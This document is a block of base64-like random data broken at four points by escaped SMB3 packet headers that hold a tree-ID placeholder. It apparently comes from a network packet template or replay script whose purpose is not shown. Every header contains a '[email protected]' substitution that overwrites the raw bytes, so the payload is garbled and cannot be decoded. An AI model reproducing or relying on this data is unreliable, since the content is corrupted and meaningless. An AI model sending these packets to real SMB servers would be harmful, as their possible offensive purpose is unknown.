vAjLvaLdgk8+BlNZs8PMa9bQ340J83nx1p4f+GLpbxUyzsAzkE9gB3hBYp3+0hNXMjbyjXwB40Q4KiDbip/d7N0CmRT1gLy+n2Rp/EYO5Fkapa4Y4kqDhPvLuOfGUvjN4BNdBk23r0/F3ZmfIe7zH9ecfDqJkkApLkf3Ls4CMvJ48cbGhUqHrML0az1LCeE3BqKLCL3gP10fExyMnFGtbq3rBd+5eKxSXYVD4fBKtFYI47YYbjYxxF76O9LNZEpPP9SiCEo9qRYLDcYzGu81JRU7/GHDKWSnvgjForSvyRO/e9ElIg1ISeyywaPJA1t1skDj8abBEOqAOXimo54/eZzGmLJ92xLwDIl8rHuZsUywgeZH/tSPXYQi0Pswy57TYZ/0/mXVIQjwi8EdJohFb3TKAzdHRMYopPusHBP7qyy18UVuiwGaf989u6seK2ER1R+aoJtvES8V0Zsx6slbdWrGxe4P62uwFxXStC/+qpCauvw/qpZvZo9wb458ezftwsbuOUYNlMWgBno/tWp5iSKfApu/I3RbVgaE3OmiLNYN3jw0gC5cT5tZZvDw9cBmHGcaVuvs+JAbsWoEsUaZd3R3Mn/1c1xYAumA/0VVaASNuohaU+8CmGSpny9/6ngCdejX4X//UMPKFxhlfaDnGbhbgr58SbJnYZ8KVeABMJeRJeLSP1f2AtrbAR8jSk5UgNllJcWnf+EM/Gyzh5DH0RqsyNfEbXNTxRzla1zNfWz0bB4fqzrdNNfNXvtTv9FWqyXCEHLhOz9p7JXzJBBUd0OR9rg8DFXIyNXMHCfeX5v/e2cDPWn7sSP1HU8sivMdWSP79eiYWZ6DOYjDkYmaBrFWuOKpwLyotORDEi1GMahE7btGFTN2IMgml2b9wZvqSuc7aAciGNkl7+NgmkG9r323QqSJrjCgp+DJ9URAkHRp/ovZWeh65j6G5mVS3o3Ux5cH2pfT/VZm8xsBsr1o2YKlVmsY6mPAOnlmaEwFLrPTm5WIYnd0yOc3abTlt6R1RfwenXgqn5K1K6Uq5o7T+KblzWV1TXo0zTIBD/CwnKbkITPd7GkK+fG/pVTIAGxuI84OwkE6U9/WO3niv3bgLtebI/5Oj2ESIrNTwBRdIGzDYcK1VTlSYl0RMsMMZvWqZAhNBs9xfpyBgzAn+5NpIUwKnm6HS2UbNab6SQIQF53r0+Rx8w7xZkOEayDuGvPQ32Y7zfHtM8o8wsNxWPtI1zCcMUyHPA3zAeGkKIy51j911mdZeLmlXULTazhCdl+lYNd6aoUthPLUew6ng+vSLSxqF1N7+/bFkcWd5vuCPigEKxEg+X3d+JviOJaI9GJ2HWIT8ehFzv6JP7ymkH0XaHYKIXXDbGpMhJWmZzOd+KeEt4MY6Be95bnyjLPxR8Htcc2E35+8q074yiBdThfaOMI18K65supem5lEgTe2lQdQurhhNhgbmYPpmWsSerB8R4CiDHQg6B1xxN9lpUnCWCn37Ib9vdQ2V90almoOSh5FfBxJiPIERqxvWkHqv3h/c0c8MZ3kLJi/+5PD+F/rT0hmgD1lUoqZ9KfEAB/ivMQzIbMnhoJ6DpDZwXvWgYON+Ti4Of8cD3JVZFHKCPtFO1LWNuXu9DHS0cChPvbPTNgL1fuz3hWniAOjJxyXhilxEmUKoCuaHrjL7/mCwA8mUTF8nZfDOYFw/CN4ol8UuKSKKNotx6s4EGyOXAGxRTqQw5Rqr70SWFUVy18EO3TCMj/3eC7HjDV7CAh6+160YbDs53m7AehAx+OlUNq01wPuaxFfSqlgcUG+9Rn1b/Xp1jvWeSkCNdYiiiXi1XwsMrdhKZGKroSXSSJclExe6ZgcNNPa/HgjvXbwtmRkgiGneql4mBYmKDzcXCkp/tjnL6/KriY81gMHN4G9ulMunxVyF8wybDcifTOxtarjLXVRuC1Y7vzYaEuHT\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x13\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0#\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd03\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0C\\\\x00\\\\x00\\\\x00\\\\x10egBG5w80ES4y87bU4/qqs68FzC3JDcJ49Fr+SxZvwt7cJSXlTB0q1URstIaOe42wEBR0cUYuI6W2FsD4uAhpqR1oNMa+xKwbIC3trPe4ltf49PmhtKoqKQSk639NB15gNGctx7J8XmosACNLfld6BPKtWF3TAGQSYAiZbGGN9+8ofnCUAMygm16XakHXZgjdRMIJ5xjECQ9XzlWIh0Ni9z4w/+5rrYnIV4a9M5ujAF7QSNkkSVMDovLJLkteu